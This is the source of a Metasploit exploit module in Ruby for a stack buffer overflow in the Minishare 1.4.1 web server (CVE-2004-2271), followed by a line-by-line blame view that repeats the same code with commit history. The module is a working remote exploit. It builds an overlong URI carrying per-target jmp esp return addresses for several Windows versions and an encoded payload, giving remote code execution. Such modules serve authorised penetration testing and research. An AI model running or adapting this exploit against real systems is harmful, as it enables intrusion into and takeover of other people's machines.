metasploit-framework/modules/exploits/windows/http/minishare_get_overflow.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Minishare 1.4.1 Buffer Overflow',
      'Description'    => %q{
          This is a simple buffer overflow for the minishare web
        server. This flaw affects all versions prior to 1.4.2. This
        is a plain stack buffer overflow that requires a "jmp esp" to reach
        the payload, making this difficult to target many platforms
        at once. This module has been successfully tested against
        1.4.1. Version 1.3.4 and below do not seem to be vulnerable.
      },
      'Author'         => [ 'acaro <acaro[at]jervus.it>' ],
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-2271'],
          [ 'OSVDB', '11530'],
          [ 'BID', '11620'],
          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
          'MinNops'  => 64,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp
          ['Windows 2000 SP4 English',     { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp
          ['Windows XP SP0-SP1 English',   { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret
          ['Windows XP SP2 English',       { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret
          ['Windows 2003 SP0 English',     { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret
          ['Windows NT 4.0 SP6',           { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp
          ['Windows XP SP2 German',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
          ['Windows XP SP2 Polish',        { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
          ['Windows XP SP2 French',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
        ],
      'DisclosureDate' => 'Nov 7 2004'))
  end

  def exploit
    uri = rand_text_alphanumeric(target['Rets'][0])
    uri << [target['Rets'][1]].pack('V')
    uri << payload.encoded

    print_status("Trying target address 0x%.8x..." % target['Rets'][1])
    send_request_raw({
      'uri' => uri
    }, 5)

    handler
  end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

New modules, module renames git-svn-id: file:///home/svn/incoming/trunk@3254 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-26 14:34:22 +00:00			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = AverageRanking`
New modules, module renames git-svn-id: file:///home/svn/incoming/trunk@3254 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-26 14:34:22 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
New modules, module renames git-svn-id: file:///home/svn/incoming/trunk@3254 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-26 14:34:22 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Minishare 1.4.1 Buffer Overflow',`
			`'Description' => %q{`
			`This is a simple buffer overflow for the minishare web`
			`server. This flaw affects all versions prior to 1.4.2. This`
			`is a plain stack buffer overflow that requires a "jmp esp" to reach`
			`the payload, making this difficult to target many platforms`
			`at once. This module has been successfully tested against`
			`1.4.1. Version 1.3.4 and below do not seem to be vulnerable.`
			`},`
			`'Author' => [ 'acaro <acaro[at]jervus.it>' ],`
			`'License' => BSD_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2004-2271'],`
			`[ 'OSVDB', '11530'],`
			`[ 'BID', '11620'],`
			`[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",`
			`'MinNops' => 64,`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp`
			`['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp`
			`['Windows XP SP0-SP1 English', { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret`
			`['Windows XP SP2 English', { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret`
			`['Windows 2003 SP0 English', { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret`
			`['Windows NT 4.0 SP6', { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp`
			`['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp`
			`['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp`
			`['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp`
			`],`
			`'DisclosureDate' => 'Nov 7 2004'))`
			`end`
New modules, module renames git-svn-id: file:///home/svn/incoming/trunk@3254 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-26 14:34:22 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`uri = rand_text_alphanumeric(target['Rets'][0])`
			`uri << [target['Rets'][1]].pack('V')`
			`uri << payload.encoded`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Trying target address 0x%.8x..." % target['Rets'][1])`
			`send_request_raw({`
			`'uri' => uri`
			`}, 5)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`end`
New modules, module renames git-svn-id: file:///home/svn/incoming/trunk@3254 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-26 14:34:22 +00:00
OSVDB references updates from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6812 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-16 16:02:24 +00:00			`end`